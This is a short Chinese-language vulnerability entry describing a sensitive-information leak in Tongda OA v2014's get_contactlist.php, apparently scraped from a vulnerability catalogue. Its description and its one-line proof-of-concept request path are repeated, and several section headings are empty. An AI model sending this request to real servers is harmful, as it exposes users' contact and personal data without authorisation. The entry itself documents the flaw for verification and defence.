通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞
漏洞描述
通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息,进一步攻击
漏洞影响
网络测绘
漏洞复现
版本信息
验证POC
/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3
通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息,进一步攻击
版本信息
验证POC
/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3